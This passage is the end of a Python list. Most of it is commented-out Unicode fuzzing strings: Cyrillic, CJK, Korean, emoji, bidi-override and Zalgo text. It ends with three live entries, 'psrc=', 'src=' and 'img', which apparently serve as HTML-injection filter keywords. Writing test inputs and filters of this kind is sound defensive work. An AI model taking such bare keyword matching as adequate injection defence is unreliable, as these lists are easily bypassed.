    # u"І",
    # u"Ї",
    # u"Ј",
    # u"Љ",
    # u"Њ",
    # u"Ћ",
    # u"Ќ",
    # u"Ѝ",
    # u"Ў",
    # u"Џ",
    # u"А",
    # u"Б",
    # u"В",
    # u"Г",
    # u"Д",
    # u"Е",
    # u"Ж",
    # u"З",
    # u"И",
    # u"Й",
    # u"К",
    # u"Л",
    # u"М",
    # u"Н",
    # u"О",
    # u"П",
    # u"Р",
    # u"С",
    # u"Т",
    # u"У",
    # u"٠",
    # u"١",
    # u"٢",
    # u"٣",
    # u"٤",
    # u"٥",
    # u"٦",
    # u"٧",
    # u"٨",
    # u"٩",
    # u"⁰",
    # u"⁴",
    # u"⁵",
    # u"₀",
    # u"₁",
    # u"₂",
    # u"田",
    # u"中",
    # u"さ",
    # u"ん",
    # u"に",
    # u"あ",
    # u"げ",
    # u"て",
    # u"下",
    # u"さ",
    # u"い",
    # u"パ",
    # u"ー",
    # u"テ",
    # u"ィ",
    # u"ー",
    # u"へ",
    # u"行",
    # u"か",
    # u"な",
    # u"い",
    # u"か",
    # u"和",
    # u"製",
    # u"漢",
    # u"語",
    # u"部",
    # u"落",
    # u"格",
    # u"사",
    # u"회",
    # u"과",
    # u"학",
    # u"원 ",
    # u"어",
    # u"학",
    # u"연",
    # u"구",
    # u"소",
    # u"찦",
    # u"차",
    # u"를",
    # u" ",
    # u"타",
    # u"고",
    # u" ",
    # u"온",
    # u"펲",
    # u"시",
    # u"맨",
    # u"과",
    # u"쑛",
    # u"다",
    # u"리",
    # u"똠",
    # u"방",
    # u"각",
    # u"하",
    # u"社",
    # u"會",
    # u"科",
    # u"學",
    # u"院",
    # u"語",
    # u"學",
    # u"研",
    # u"究",
    # u"所",
    # u"울",
    # u"란",
    # u"바",
    # u"토",
    # u"르",
    # u"𠜎",
    # u"𠜱",
    # u"𠝹",
    # u"𠱓",
    # u"𠱸",
    # u"𠲖",
    # u"𠳏",
    # u"👩🏽",
    # u"👾",
    # u"🙇",
    # u"💁",
    # u"🙅",
    # u"🙆",
    # u"🙋",
    # u"🙎",
    # u"🙍",
    # u"🐵",
    # u"🙈",
    # u"🙉",
    # u"🙊",
    # u"❤",
    # u"💔",
    # u"💌",
    # u"💕",
    # u"💞",
    # u"💓",
    # u"💗",
    # u"💖",
    # u"💘",
    # u"💝",
    # u"💟",
    # u"💜",
    # u"💛",
    # u"💚",
    # u"💙",
    # u"✋🏿",
    # u"💪🏿",
    # u"👐🏿",
    # u"🙌🏿",
    # u"👏🏿",
    # u"🙏🏿",
    # u"🚾",
    # u"🆒",
    # u"🆓",
    # u"🆕",
    # u"🆖",
    # u"🆗",
    # u"🆙",
    # u"🏧",
    # u"🇺",
    # u"🇸",
    # u"🇷",
    # u"🇺",
    # u"🇸",
    # u"🇦",
    # u"🇫",
    # u"🇦",
    # u"🇲",
    # u"🇸",
    # u"１",
    # u"２",
    # u"３",
    # u"١",
    # u"٢",
    # u"٣",
    # u"‪‪test‪",
    # u"Z̮̞̠͙͔ͅ",
    # u"Ḁ",
    # u"̗̞͈̻̗Ḷ",
    # u"͙͎̯̹̞͓G̻",
    # u"O̭̗̮",
    "psrc=",
    "src=",
    "img"
]
